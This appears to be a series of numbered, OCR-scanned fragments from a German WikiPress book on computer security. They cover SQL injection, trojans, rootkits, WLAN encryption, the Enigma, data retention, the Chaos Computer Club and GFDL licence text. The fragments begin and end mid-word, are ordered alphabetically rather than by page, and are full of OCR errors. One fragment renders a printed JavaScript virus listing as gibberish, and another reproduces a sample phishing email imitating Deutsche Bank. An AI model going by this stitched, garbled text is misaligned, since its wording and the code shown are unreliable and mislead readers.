181. ationen mit verschiedenen Befehlssequenzen kodieren so dass verschiedene Varianten entstehen var ecwew gsvlherdtef ircessimg ff ecwewlgsy Ther dtt function P aa se aac cia 4 abcny ghpuw cxnumud function ihtmnwe im sqancemxbyd t IF C684 56 2 y 3 012 Hyugsteyy var arnx11211 887405 For Cnfqxwuqsoge CC C3073 1 2 7 9 5 2 E CC 0002 5 9 107 Ce Function jpskiC 1 Taqwedd function nmweckt ecqsegnht var xkowymoos4 O76 744 Function x uzk Ou jexcgpkgdd length var Ttrodpkw 68005 var boyfmtinf en FF boytmtint var Upatomm gFcuixt ff Upatomm function vdelxuco duvjop Ca function ytsrrg Ihwigbel function duferr jt leesgl r ifl4834 3637 bngpijfl function an kw C7 y Function rwIflige ttookberachr var TomrdkpType 217334 5 iF 2425 8680 ovivaggipexq var ghsjkrktw umyxddugmgtkh ff ghsjkrktw function drtbzyqj whhj Cy function ddrcphtjinwglis Ci function evfhkf Ooi qettxhty oy function Ftjgdet i ylbsxt jt if 2811 34 77 aivexyqyd t Function Foyol ssjbnjtyjj skjoxbrje substr ingli l 00038 7 49 Abb 4 Teil eines polymorph verschl sselten JavaScript Virus 35 Viren W rmer Trojaner Retroviren zielen darauf ab Virenschutzprogramme und Firewalls zu deaktivieren Da sie sich dadurch nicht nur selbst vor Entdeckung sch tzen sondern auch anderen Schadprogrammen T r und Tor ff nen gelten sie als sehr gef hrlich wenngleich sie 200
182. au ter So wurde kurzerhand Ende Dezember 1984 im Hamburg Eidelstedter B rgerhaus der 1 Chaos Communication Congress veranstaltet Erster Fall von Netzzensur Schon 1985 wurde der Club in eine Ange legenheit verwickelt in der es um Informationsfreiheit ging einem der sp teren Schwerpunktthemen des CCC Auf den BTX Seiten des Clubs sammelten sich diverse Texte zu kontroversen Themen an getreu nach dem Leitspruch aus der Hackerethik Alle Informationen m ssen frei sein So lie sich auch ein Auszug aus der Dissertation Penisverletzun gen bei Masturbation mit Staubsaugern von Theimuras Michael Alschi baj aus dem Jahr 1978 aufrufen Da insbesondere Staubsauger des Typs Kobold der Firma Vorwerk zu Verletzungen f hren f rchtete der Traditi onsbetrieb negative Publicity und sah sich durch den CCC gesch digt Er verklagte den Club auf 500 000 DM Schadensersatz durch Rufsch digung und verlangte von der Bundespost als Betreiberin des BTX Systems die Sperre der Seite Erst nachdem der Doktorvater der Dissertation und ein Betroffener Vorwerk vorgestellt werden konnten zog die Firma die Klage zur ck Der CCC wird e V Im Zuge der Novelle des 2 Wirtschaftskriminali t tsgesetzes wurde die Computerkriminalit t in das Strafgesetzbuch auf genommen Ohne ein eingetragener Verein zu sein h tte der CCC sehr schnell als Kriminelle Vereinigung gegolten Daher wurde der CCC e V 1986 gegr ndet und in das Vereinsregister Hamburg einget
183. auch Escapen genannt Ein Beispiel Die vom Benutzer eingegebene Zeichenfolge Mit n wird ein Zeilenumbruch erzeugt wird korrekt maskiert als Mit n wird ein Zeilenumbruch erzeugt an die Datenbank bergeben Au erdem muss sichergestellt wer den dass Datentypen eingehalten werden so d rfen zum Beispiel Zahlen nur aus Ziffern und dem Dezimaltrennzeichen bestehen Oft zu finden sind SQL Injection L cken in CGI Scripten und auch in Programmen die Daten wie Webseiteninhalte oder E Mails in SQL Da tenbanken eintragen Nimmt ein solches Programm die Maskierung nicht korrekt vor kann ein Angreifer durch den gezielten Einsatz von Funkti onszeichen weitere SQL Anforderungen einschleusen oder die Abfragen so manipulieren dass zus tzliche Daten ausgegeben werden In einigen F llen besteht auch die M glichkeit Zugriff auf eine Shell zu erhalten was im Regelfall die M glichkeit zur Kompromittierung des gesamten Servers bedeutet Stored Procedures sind in diesem Zusammenhang sicherer Dabei werden die Benutzereingaben in einem Programm an die Stored Procedures ber geben Erst dort wird die SQL Abfrage erzeugt und ausgef hrt wodurch die Injektion weiterer SQL Befehle in Benutzereingaben verhindert wird Vorgang Ver nderung von Daten Auf einem Webserver findet sich das Script find cgi zum Anzeigen von Artikeln Das Script akzeptiert den Parameter ID welcher sp ter Bestandteil des SQL Befehls wird Folgende Tabelle
184. auf dem Datentr ger verschliisselt und der Schl ssel wird nur befugten Parteien tibergeben beispielsweise Gerateherstel lern Die Laufwerke des Herstellers k nnen die Daten dann entschl s seln k nnen aber nur mit autorisierter Software angesteuert werden So soll Kopierprogrammen der Zugang zu den Daten verwehrt werden Beispiel CSS bei der DVD Software wird h ufig mit kommerziellen Kopierschutzverfahren vor unerlaubter Vervielf ltigung gesch tzt Ein bekannter Hersteller von Videokopierschutz ist Macrovision 120 Kopierschutz HDMI und DVI Stecker in HD ready Ger ten haben schon heute eine digitale Schnittstelle welche einen von der US Filmindustrie geforder ten Kopierschutz f r HDTV Filme enth lt Rechtslage Nach dem neuen deutschen Urhebergesetz ist es verboten wirksame technische Ma nahmen die das Kopieren verhindern zu umgehen Was hierbei wirksam bedeutet ist jedoch unter Experten erheblich umstrit ten Dar ber hinaus gilt dieses Verbot gem 69a Abs 5 UrhG nicht bei Computerprogrammen Und wer eine Kopiersperre f r sich selber um geht wird gem 108b UrhG auch nicht bestraft Grunds tzlich erlaubt ist das Wiederaufnehmen von Musik Unter Umst nden ist das Einbringen eines Kopierschutzes der die le gale Privatkopie nicht zul sst auch nach 303 StGB Computersabotage strafbar da hiermit Daten unterdr ckt werden die dem Nutzer nach dem Urhebergesetz zustehen Klarheit werden ab
185. be zu immer demselben Geheimtext nur wenn immer der gleiche Initialisie rungsvektor verwendet wird Beide Verfahren sind also letztlich de terministisch Doch unterscheiden sich innerhalb eines Klartextes die Transformationen Wenn im Klartext zweimal derselbe Klartext Block aufeinanderfolgt f hren CBC Verfahren im Gegensatz zu ECB Verfahren zu unterschiedlichen Geheimtextbl cken Klartextverarbeitung Klartexte k nnen bei den meisten Verfahren nicht als Ganzes verschl s selt werden da die verwendeten Algorithmen bez glich der Menge der zu verschl sselnden Daten limitiert sind Je nach Art der Klartextverarbei tung unterscheidet man daher zwei unterschiedliche Verfahren Bei der Blockverschl sselung wird der Klartext vor der Verschl sse lung in Bl cke gleicher Gr e aufgeteilt Diese Bl cke werden dann einzeln verschl sselt 283 Kryptografie Bei der Stromverschl sselung wird der Klartext zeichen oder bitweise verschl sselt Solche Algorithmen bezeichnet man auch als Online Al gorithmen Blockbasierte Verfahren liefern in der Regel bessere Ergebnisse Allerdings m ssen zu kleine Bl cke dabei durch bedeutungslose Zeichen aufgef llt wer den so dass sie eine h here bertragungskapazit t in Anspruch nehmen bertragung der Nachricht Eine verschl sselte Nachricht muss in der Regel ber mehrere Stationen bertragen werden Heute handelt es sich dabei meist um einzelne Com putersysteme d h die verschl
186. beim CIA weiterzuge ben nicht nachkam Als Folge gab es im September 1987 aufgrund von Strafanzeigen vom CERN in der Schweiz und von Philips Frankreich et liche Hausdurchsuchungen durch das BKA in Zusammenarbeit mit der franz sischen Staatsanwaltschaft Es wurde vorgeworfen dass die Rech ner der R stungsfirma Thomson in Grenoble geknackt die Datenbest n de der Zementfabrik Lafarge gel scht und bei Philips m glicherweise Konstruktionspl ne f r einen Chip ausspioniert wurden Als gl cklich mag sich erwiesen haben dass CCC Pressesprecher Stef fen Wernery w hrend der Hausdurchsuchung ein in der N he befindliches TV Team des Senders SAT 1 traf Somit wurde die Hausdurchsuchung Teil der Live Berichterstattung in den Abendnachrichten Am 14 M rz 1988 die Sache schien fast vergessen reiste Wernery zur SECURICOM 88 dem 6 Internationalen Kongress ber Datenschutz und Datensicherheit nach Paris Jedoch bereits bei der Ankunft am Flughafen wurde er aufgrund der Strafanzeige von Philips Frankreich verhaftet und unter fadenscheinigen Gr nden zum Verh r festgehalten Erst nach ber acht Wochen am 20 Mai 1988 konnte er aus der Haft entlassen nach Deutschland zur ckkehren Weitere Geschichte Wenig sp ter geriet der Verein ins Zwielicht als Hacker aus dem Umfeld des CCC zu nennen ist vor allem Karl Koch In formationen an den KGB verkauften KGB Hack Ein weiteres d steres Kapitel ist der Tod des Hackers Tron der 1998
187. ber den Kontakt F und flie t in die rechte Walze Der Strom verl sst die rechte Walze schlie lich am Kontakt G Nach Austritt aus dem Walzensatz wird der Strom ber die Eintritts walze zur ck zum Steckerbrett geleitet Ist hier der Buchstabe G mit einem anderen Buchstaben gesteckert dann findet eine letzte Permutation statt Ist G ungesteckert leuchtet die Lampe G auf Sie leuchtet brigens nur solange auf wie die Taste gedr ckt gehalten wird L sst man sie los er lischt die Lampe Im geschilderten Beispiel wird somit der Buchstabe A dessen Taste eingangs gedr ckt wurde und noch immer gedr ckt ist als Buchstabe G verschl sselt Falls der zu verschl sselnde Text AACHENISTGERETTET lautet ist erneut ein A einzugeben Also wird die Taste A losgelassen und zum zweiten Mal gedr ckt Wichtig ist dass mit dem mechanischen Druck auf die Taste mit Hilfe eines Fortschaltmechanismus gleichzeitig die rechte Walze um eine Position rotiert wird Die mittlere Walze rotiert erst nach 26 Schritten der rechten Walze Durch die ver nderte Position hat sich der Pfad f r den erneut am Kon takt A der rechten Walze eintretenden Strom radikal ge ndert Er nimmt jetzt auch bei der mittleren und linken Walze sowie der Umkehrwalze ei nen v llig anderen Weg als zuvor obwohl sich diese Walzen nicht gedreht haben Das Ergebnis ist eine andere Verschl sselung des Buchstabens A der nun in C umgewandelt wird Bedienung Bei der Enigma I stand
188. bestimmte Zeit auf um bei Unstimmigkeiten bez glich der Telefonrech nung die von ihnen erbrachten Leistungen nachweisen zu k nnen Der Deutsche Bundestag hat in einem am 17 Februar 2005 gefassten Beschluss die geplante Mindestspeicherfrist und damit eine Speicherung von Verkehrsdaten auf Vorrat ausdr cklich abgelehnt Er hat die Bundes regierung aufgefordert diesen Beschluss auch auf EU Ebene mitzutragen 156 Chaos Computer Club Europ ische Richtlinie Lange wurde dar ber diskutiert ob und inwieweit der Rat der Europ i schen Union die Mitgliedstaaten durch einen Rahmenbeschluss zur Vor ratsspeicherung von Telekommunikationsdaten verpflichten kann oder ob ein derartiger Beschluss der Zustimmung des EU Parlaments bedarf Am 14 Dezember 2005 stimmte das Parlament der Europ ischen Uni on schlie lich mit den Stimmen der Christdemokraten und der Sozialde mokraten mit 378 Stimmen 197 Gegenstimmen 30 Enthaltungen f r die umstrittene Richtlinie zur Vorratsdatenspeicherung Jetzt muss die Richt linie innerhalb von 18 Monaten in nationales Recht umgesetzt werden Gegner dieser Entscheidung wie der irische Justizminister bezweifeln jedoch die Verfassungsm igkeit und k ndigten eine Klage vor dem Eu rop ischen Gerichtshof an Zwischen der Vorstellung des Richtlinienentwurfs und der entschei denden Lesung lagen nur drei Monate Damit ist es das bisher schnellste Gesetzgebungsverfahren in der EU Geschichte Kritiker bem ngeln
189. bps max Verabschiedung des Standards voraussichtlich 2006 Bei der Betrachtung der Datenraten ist allerdings zu ber cksichtigen dass sich alle Ger te im Netz die Bandbreite teilen Weiterhin sind die angegebe nen Datenraten Bruttowerte und selbst unter optimalen Bedingungen liegt die erreichbare Netto Datenrate nur wenig ber der H lfte dieser Angaben Kanal Frequenz Bemerkung 1 2 412 GHz Europa USA Japan keine berschneidung 2 2 417 GHz Europa USA Japan 3 2 422 GHz Europa USA Japan 4 2 427 GHz Europa USA Japan 5 2 432 GHz Europa USA Japan 6 2 437 GHz Europa USA Japan keine Uberschneidung 7 2 442 GHz Europa USA Japan 8 2 447 GHz Europa USA Japan 9 2 452 GHz Europa USA Japan 10 2 457 GHz Europa USA Japan 11 2 462 GHz Europa USA Japan keine Uberschneidung 12 2 467 GHz Europa Japan 13 2 472 GHz Europa Japan 14 2 484 GHz Japan 246 Wired Equivalent Privacy Die 802 11 WLAN Hardware nutzt einen breiten Frequenzbereich um einen Kanal herum f r die Daten bertragung Deshalb gibt es nur drei berlappungsfreie Frequenzb nder im zugelassenen Spektrum ISM Manche Netzwerkadapter nutzen mehrere B nder gleichzeitig um die Datenrate zu steigern St rungsfreier Betrieb mit voller Datenrate ist nur m glich wenn der Abstand zwischen den benutzen Kan len mindestens vier Kan le betr gt Solch eine m gliche Kanalbelegung ist in der Tabelle als keine berschneidung angegeben L
190. ced on covers that bracket the Document within the aggregate or the electronic equivalent of covers if the Document is in electronic form Otherwise they must appear on printed covers that bracket the whole aggregate 8 TRANSLATION Translation is considered a kind of modification so you may distribute translations of the Document under the terms of section 4 Replacing Invariant Sections with translations requires special permission from their copyright holders but you may include translations of some or all Invariant Sections in addition to the original versions of these Invariant Sections You may include a translation of this License and all the license notices in the Document and any Warranty Disclaimers provided that you also include the original English version of this License and the original versions of those notices and disclaimers In case of a disagreement between the translation and the original version of this License or a notice or disclaimer the original version will prevail If a section in the Document is Entitled Acknowledgements Dedications or History the requirement section 4 to Preserve its Title section 1 will typically require changing the actual title 9 TERMINATION You may not copy modify sublicense or distribute the Document except as expressly provided for under this License Any other attempt to copy modify sublicense or distribute the Document is void and will automatically terminate your rights
191. ch Sandstorm jha Jodevin Goodkarma Napa Stefan Sch rli Nornen3 Stefan freimark de RokerHRO Rumbel Ilja Lorek Zwobot Jo i ALE Stefan Hintz Andrsvoss Lobservateur Unscheinbar Rat Zbik Nd Tectower MelancholieBot Friedemann Lindenthal anonym 12 1 06 1 2 06 WikiPress Redaktion 237 Angriffe Leistung aus Leidenschaft Deutsche Bank Sehr geehrte Kundin sehr geehrter Kunde Der technische Dienst der Bank fuhrt die planmassige Aktualisierung der Software durch Fur die Aktualisierung der Kundendatenbank ist es notig Ihre Bankdaten erneut zu bestatigen Dafuer mussen Sie unseren Link unten besuchen wo Ihnen eine spezielle Form zum Ausfullen angeboten wird hitps meine deutsche hank de mad WehObjects dhphr woa 407 wo confirm asp Diese Anweisung wird an allen Bankkunden gesandt und ist zum Erfullen erforderlich Wir bitten um Verstandnis und bedanken uns fur die Zusammenarbeit Deutsche Bank AG Alle Rechte vorbehalten Abb 20 Beispiel einer Phishing Mail Deutsche Bank Herzlich willkommen db OnlineBanking F llan Sie bitte Etledigen Sie Ihre den t glichen Bankgesch fte Fragebogen f r flaxibel und baquem mit die Best tigung unserem vet db OnlineBank ng Bankdaten lt Demokonto testen aus Alle gt Konto er ffnen Falder sind Konto f r Online und Pflichtfelder Telefonbanking fraischalten Ihre Deutsche Bank Hilfe H ufig gestellte Fragen gt BLZ Suche Fau
192. ch der Installation unabh ngig vom urspr nglichen Trojanischen Pferd das nur als ber tr ger dient sie kann daher durch das L schen der bertr gerdatei nicht entfernt werden Auf dem infizierten PC k nnen durch die Schadroutine schlie lich alle Funktionen ausgef hrt werden die der Status des ange meldeten Benutzers zul sst Da zahlreiche Nutzer aus Bequemlichkeit oder aufgrund fehlender Kenntnis der Risiken dauerhaft mit Administ ratorrechten arbeiten ist das Spektrum an Manipulationsm glichkeiten durch die Schadroutine oder durch einen beliebigen Angreifer ber das Netzwerk mittels einer Hintert r Backdoor unbegrenzt Das Trojani sche Pferd kann demnach in der Regel selbstst ndig oder ferngesteuert alle Aktionen unentdeckt ausf hren die auch der Benutzer des infizierten Computers willentlich ausf hren k nnte Im Folgenden sind beispielhaft einige g ngige Schadfunktionen aufge listet um einen Einblick in die M glichkeiten der Manipulation an infi zierten Rechnern zu geben Unerw nschte Werbung aus dem Internet einblenden oder den An wender ungewollt auf bestimmte Webseiten umleiten berwachung des Datenverkehrs oder aller Benutzeraktivit ten mit hilfe von Sniffern Aussp hen von sensiblen Daten Passw rter Kreditkartennummern Kontonummern und hnliches Dateien kopieren und weiterleiten Fernsteuerung von Unbekannten u a f r kriminelle Zwecke z B zum Versenden von Werbe E Mails oder Durchf hru
193. ch die Nutzung von Pre Shared Keys ist die Einbindung in bestehende Systeme einfacher geworden Die Nutzung von 802 1x auf der Basis von RADIUS erlaubt die eindeu tige Identifikation von Benutzern Dariiber hinaus umfasst 802 11i die Re geln fiir die Verwendung von Advanced Encryption Standard AES zur Verschl sselung von Daten Quelle http de wikipedia org wiki IEEE_802 11i Historie 9 7 04 Anonym angelegt danach bearbeitet von den Hauptautoren Winne Lofor anonym 12 1 06 1 2 06 WikiPress Redaktion Temporal Key Integrity Protocol Das Temporal Key Integrity Protocol TKIP ist Teil des Standards IEEE 802 11i und wird zur Verschl sselung der Daten in Wireless LANs verwendet Um die WLAN Sicherheit in 802 11 Netzen zu verbessern hat die Wireless Ethernet Compatibility Alliance WECA das Temporal Key In tegrity Protocol entwickelt welches das WEP Protokoll ersetzen soll TKIP verwendet f r den tempor ren Schl ssel wie WEP den RC4 Algorithmus f r die Verschl sselung Der Schl ssel ndert sich tempor r daher auch der Name des Protokolls und zwar immer dann wenn ein Datenpaket von 10 KB bertragen wurde Der Initialisierungsvektor IV besteht aus einem Lo Teil von 16 Bit und einem 32 Bit langen Hi Teil Die L nge des Lo Teils erh ht sich von Datenpaket zu Datenpaket um ein Bit Der Empf nger berpr ft diese Sequenz und verwirft Datenpakete die einen bereits benutzten Initiali sierungsvektor haben
194. ch relativ einfach durch den Vergleich der Pr fsummen der Programmdateien aufzusp ren Hierbei ist zu be achten dass Pr fprogramme wie md5sum ebenfalls oft kompromittiert werden Kernel Rootkits ersetzen Teile des Betriebssystem Kerns durch eigenen Code um sich selbst zu tarnen und dem Angreifer zus tzliche Funktionen zur Verf gung zu stellen die nur im Kontext des Kernels aus gef hrt werden k nnen Dies geschieht am h ufigsten durch Nachladen von Kernelmodulen Man nennt diese Klasse von Rootkits daher auch LKM Rootkits LKM steht f r engl loadable kernel module Einige Ker 84 Spamfilter nel Rootkits kommen durch die direkte Manipulation von Kernelspeicher auch ohne LKM aus Quelle http de wikipedia org wiki Rootkit Historie 2 12 03 Angelegt von Echoray danach bearbeitet von den Hauptautoren Echoray LosHawlos Guidod Volty Ing Fabian Bieker Berlin Jurist Steven Malkovich Tonk Stern Rockoo Simon W WikiMax RobotQuistnix Thomas Willerich Jed anonym 12 1 06 1 2 06 WikiPress Redaktion Spamfilter Ein Spamfilter ist ein Computerprogramm zum Filtern von unerw nsch ten Werbe E Mails so genanntes Spam Dabei gibt es mehrere unter schiedliche Methoden Aussortieren anhand regul rer Ausdr cke so genannter Blacklists Ausfiltern mittels eines Bayes Filter Ausfiltern mittels einer Datenbank basierten L sung DB Filter Blacklist Methode Diese Methode berpr ft den Inhalt der E Mail nach best
195. che Beispiele f r solche M glichkeiten sind Das Senden extremer Bildsignale an Bildschirme Heute nicht mehr ge br uchliche Festfrequenzmonitore waren daf r anf llig es gab Viren die diese Angriffe auf solche Monitore tats chlich durchgef hrt haben Heute ist eine Besch digung durch fehlerhafte extreme Bildsignale so gut wie ausgeschlossen bertakten von Graphikkarten die es erlauben die Taktfrequenz der Bausteine per Software einzustellen Bei einer zu hohen bertaktung und nicht ausreichenden K hlung k nnen Bausteine berhitzen und besch digt oder zerst rt werden bertakten von Bausteinen auf dem Motherboard die dadurch selbst berhitzen oder andere Bauteile berlasten k nnen Widerst nde In tegrierte Bausteine Da im heutigen PC Bereich die Hardwarekomponentenauswahl sehr he terogen ist gilt bisher die Meinung dass es sich f r Virenautoren nicht lohnt solche Angriffe durchzuf hren Ein als Hardwareschaden missinterpretierter Schaden ist das ber schreiben des BIOS das heute meist in Flash Speichern gespeichert ist Wird dieser Flash Speicher b swillig berschrieben kann der Rechner nicht mehr starten Da der Rechner nicht mehr startet wird oft f lschli cherweise ein Hardwareschaden angenommen Der Flash Speicher muss in diesem Fall ausgebaut und mit einem korrekten BIOS neu bespielt wer den Ist der Flash Speicher fest eingel tet ist das Ausbauen wirtschaftlich nicht rentabel und das g
196. chen Texteditor oder f r Bilder die aus Pixeln bestehen mit einem gew hnlichen Bildbearbeitungsprogramm oder f r Zeichnungen mit einem blichen Zeichenprogramm auf einfache Weise berarbeitet werden kann und dass sie eine geeignete Eingabe f r Textformatierer oder f r die automatische Konvertierung in eine Reihe von Formaten darstellt die sich ihrerseits als Eingabe f r Textformatierer eignen Eine Kopie in ein eigentlich transparentes Dateiformat dessen Auszeichnungen oder dessen fehlenden Auszeichnungen jedoch so aufgebaut sind dass sp tere Ver nderungen durch Leser 331 Anhang verhindert oder erschwert werden hei t nicht transparent Ein Bildformat ist nicht transparent wenn es f r eine erhebliche Menge Text verwendet wird Eine Kopie die nicht transparent ist wird als opak bezeichnet Beispiele geeigneter Formate f r transparente Kopien sind einfaches ASCII ohne Auszeichnungen Eingangs format f r Texinfo Eingangsformat f r LaTeX SGML oder XML mit ffentlich zug nglicher DTD sowie standard konformes einfaches HTML Postscript oder PDF das auf Ver nderungen durch Menschen ausgelegt ist Beispiele f r transparente Bildformate sind PNG XCF und JPG Opake Formate sind unter anderen solche propriet ren Formate die nur von propriet ren Textverarbeitungsprogrammen gelesen und verarbeitet werden k nnen SGML oder XML deren DTD und oder Verarbeitungswerkzeuge nicht allgemein verf gbar sind und maschinengen
197. chnitt der verschiedenen Originaldokumente zu einem einzigen Historie berschriebenen Abschnitt verbinden entsprechend verfahren Sie mit allen Abschnitten die mit Danksagungen und Widmungen berschrieben sind Alle mit Empfehlungen berschriebenen Abschnitte m ssen gel scht werden 6 SAMMLUNGEN VON DOKUMENTEN Sie k nnen eine Sammlung von Dokumenten erstellen die aus dem Dokument und weiteren Dokumenten besteht die unter dieser Lizenz freigegeben sind Hierzu ersetzen Sie die einzelnen Kopien dieser Lizenz in den verschiedenen Dokumenten durch eine einzige Kopie die in der Sammlung enthalten ist vorausgesetzt Sie befolgen die Regeln dieser Lizenz f r unver ndertes Kopieren aller Dokumente in jeder anderen Hinsicht Sie k nnen ein einzelnes Dokument aus einer solchen Sammlung herausl sen und einzeln unter dieser Lizenz verbreiten vorausgesetzt Sie f gen eine Kopie dieser Lizenz in das herausgel ste Dokument ein und folgen ansonsten in jeder Hinsicht dieser Lizenz in Bezug auf die unver nderte Vervielf ltigung des Dokuments 7 ZUSAMMENLEGUNG MIT UNABH NGIGEN WERKEN Eine Zusammenstellung eines Dokuments oder seiner Bearbeitungen mit anderen eigenst ndigen und unabh ngigen Dokumenten oder Werken in oder auf demselben Speicher oder Verbreitungsmedium wird dann eine Zusammenlegung genannt wenn das aus der Zusammenstellung resultierende Copyright nicht dazu verwendet wird die Rechte der Benutzer der Zusammens
198. ckter Hacker der die Dinge mit einfachen Mitteln angeht wird in diesem Zusammenhang jemand bezeichnet der sinnbildlich nur mit einer Axt als Werkzeug M bel herstellen kann Im Allgemeinen besteht eine starke Assoziation zwischen den Begrif fen Hacker und Computerfreak zumal es kaum Computerfreaks gibt die nicht programmieren k nnen oder sich mit Netzwerk und Sicherheits technologie nicht auskennen Auch nennen sich Leute die eine Affinit t zur Hackerkultur zeigen gerne Nerd oder Geek was im Computerkontext eine spezielle Art des Computerfreaks charakterisiert Der Begriff Hacker gilt auch als Synonym f r jemanden der am Com puter seine Befehlszeilen auf eine sehr schnelle Art eingeben kann Hier bei wird oft auf das Tippger usch Bezug genommen welches so klingt als w rde jemand herumhacken Daraus ist ersichtlich dass es unter den Insidern keine einheitliche Definition eines Hackers gibt Demgegen ber hat sich in den K pfen der restlichen Bev lkerung schon lange eine allgemeing ltige Hackerdefiniti on verfestigt siehe den ersten Satz der einleitenden Definition Die problematische Unterteilung zwischen Hacker und Crasher bzw Cracker Stark vereinfacht ausgedr ckt l sen Hacker Probleme und bau en etwas auf wohingegen Crasher Probleme erzeugen bzw etwas zerst ren Im Detailbauen Hacker beispielsweise Informationsnetze auf machen auf Sicherheitsl cken aufmerksam und erreichen so dass diese geschlos sen wer
199. conditions of sections 2 and 3 above provided that you release the Modified Version under precisely this License with the Modified Version filling the role of the Document thus licensing distribution and modification of the Modified Version to whoever possesses a copy of it In addition you must do these things in the Modified Version A Use in the Title Page and on the covers if any a title distinct from that of the Document and from those of previous versions which should if there were any be listed in the History section of the Document You may use the same title as a previous version if the original publisher of that version gives permission List on the Title Page as authors one or more persons or entities responsible for authorship of the modifications in the Modified Version together with at least five of the principal authors of the Document all of its principal authors if it has fewer than five unless they release you from this requirement State on the Title page the name of the publisher of the Modified Version as the publisher Preserve all the copyright notices of the Document Add an appropriate copyright notice for your modifications adjacent to the other copyright notices Include immediately after the copyright notices a license notice giving the public permission to use the Modified Version under the terms of this License in the form shown in the Addendum below Preserve in that license notice the full lists
200. d Igelball Der Ersteller Mathias Schindler anonym 12 1 06 1 2 06 WikiPress Redaktion 116 Trusted Platform Module Trusted Platform Module Das Trusted Platform Module TPM ist ein Chip der als Teil der TCG Spezifikation vorher TCPA Computer sicherer machen soll Er ent spricht einer fest eingebauten Smartcard mit dem wichtigen Unterschied dass er nicht an einen konkreten Benutzer sondern an ein System gebun den ist Neben der Verwendung in PCs soll er in PDAs Mobiltelefone und Unterhaltungselektronik integriert werden Der Chip ist passiv und kann weder den Bootvorgang noch den Betrieb direkt beeinflussen Er enth lt eine eindeutige Kennung und dient damit zur Identifizierung des Rechners Es ist m glich dass zum Ausf hren von bestimmten Anwendungen ein aktiviertes TPM vorausgesetzt wird Die Schl ssel Endorsement Key Pair EK Der EK ist genau einem TPM eindeutig zu geordnet Die Schl ssell nge ist auf 2048 Bit und der Algorithmus auf das RSA Verfahren festgelegt Zum einen aus Sicherheits zum anderen aus Datenschutzgr nden d rfen weder der private noch der ffentliche Teil das TPM verlassen auch ein Backup des EK ist somit ausgeschlossen Die Erzeugung dieses Keys kann hingegen extern erfolgen Erlaubt ist inzwi schen die L schung und Neu Erzeugung des Schl ssels Laut aktueller Spec kann der ffentliche Teil mit dem Kommando TPM_ReadPubek gelesen werden Dies kann aber mit dem Kommando TPM_Disab
201. d Auf der einen Seite wurden die Tie re in den vergangenen Jahrhunderten grausam ejagt auf der anderen stellen einige Arten elbst gef hrliche J ger dar deren Opfer vor lem Pinguine sind Wie die 33 verschiedenen obbenarten aussehen wie sie sich ern hren nd fortpflanzen und wo sie vorkommen wird diesem Buch umfassend und kenntnisreich beschrieben on OQ CZ mo 5 Robben Verbreitung Lebensweise Artenschutz WikiPress 5 ISBN 3 86640 005 5 8 90 WIKI 15 der freien Enzyklop die Wikipedia PRESS usant 1 von Achim Raschka Friedens nobelpreistr ger Adie Wikipedia Mirko Thiessen DTP professionell Wie gestalte ich eine Seite Welche Satzpro gramme gibt es auf dem Markt Wie erstelle ich ein druckf higes PDF und welche M glichkei ten bieten XML basierte Druckvorlagen Dieses Handbuch bietet konzentrierte aktuelle Informationen f r alle die sich beruflich oder im Rahmen einer Ausbildung mit den Themen Desktop Publishing Bildbearbeitung Farbman angement und Druckvorstufe besch ftigen Der Schwerpunkt liegt dabei auf modernen Tech niken geltenden Standards Normen und den Entwicklungen in naher Zukunft wie der auto matisierten Erstellung von Druckvorlagen mi XML DTP professionell Grundlagen Standards Perspektiven WikiPress 9 ISBN 3 86640 009 8 9 90 Hip Hop Rapper und Scratcher Breakdancer und Graffiti K nstler DJs und MCs Die vor rund 30
202. d TLS 1 0 sind sehr klein Doch dadurch entstanden Versions Verwirrungen So meldet sich TLS 1 0 im Header als Version SSL 3 1 Sp ter wurde TLS durch weitere RFCs erweitert RFC 2712 Addition of Kerberos Cipher Suites to Transport Layer Security TLS RFC 2817 Upgrading to TLS Within HTTP 1 1 erl utert die Be nutzung des Upgrade Mechanismus in HTTP 1 1 um Transport Layer Security TLS ber eine bestehende TCP Verbindung zu in itialisieren Dies erlaubt es f r unsicheren und f r sicheren HTTP Verkehr die gleichen well known TCP Ports 80 bzw 443 zu benutzen RFC 2818 HTTP Over TLS trennt sicheren von unsicherem Ver kehr durch Benutzung eines eigenen Server TCP Ports RFC 3268 Advanced Encryption Standard AES Ciphersuites for Transport Layer Security TLS nutzt die Erweiterbarkeit von TLS und f gt den bisher unterst tzten symmetrischen Verschl sse lungsalgorithmen RC2 RC4 International Data Encryption Al gorithm IDEA Data Encryption Standard DES und Triple DES den Advanced Encryption Standard AES hinzu Funktionsweise Im OSI Modell ist SSL oberhalb der Transportschicht z B TCP und unter Applikationsprotokollen wie HTTP oder SMTP angesiedelt SSL arbeitet transparent so dass es leicht eingesetzt werden kann um Proto kollen ohne eigene Sicherheitsmechanismen abgesicherte Verbindungen zur Verf gung zu stellen Zudem ist es erweiterbar um Flexibilit t und
203. d den Schutz der Privatsph re in der elektronischen Kommunikation Nachdem die Umsetzungsfrist der Richtlinie am 31 Dezember 2003 abgelaufen war wurde gegen neun Mitgliedsstaaten ein Vertragsverletzungsverfahren eingeleitet nachdem nur Schweden die Richtlinie daraufhin vollst ndig umgesetzt hat droht Belgien Deutschland Griechenland Frankreich Luxemburg den Niederlanden Portugal und Finnland ein Verfahren vor dem Europ ischen Gerichtshof Vom EU Parlament wurde auf europ ischer Ebene am 14 12 2005 die Einf hrung einer obligatorischen Vorratsdatenspeicherung von Ver kehrsdaten der Telekommunikation und des Internets mit den Stimmen von Christdemokraten und Sozialdemokraten beschlossen Von Seiten des Rates und der Kommission wurden Mindestfristen von sechs Monaten Internet und einem Jahr Telefonie vorgeschlagen gespeichert werden sollen die Daten nun bis zu 2 Jahre Die Beschl sse zur Vorratsdatenspei cherung werden von den staatlichen Datenschutzbeauftragten kritisiert Bundesrepublik Deutschland Der Datenschutz ist nach der Rechtspre chung des Bundesverfassungsgerichts ein Grundrecht Recht aufinforma 16 Datenschutz tionelle Selbstbestimmung Danach kann der Betroffene grunds tzlich selbst dar ber entscheiden wem er welche pers nlichen Informationen bekannt gibt Auf Bundesebene regelt das Bundesdatenschutzgesetz BDSG den Datenschutz f r die Bundesbeh rden und den privaten Bereich d h f r alle Wirtsc
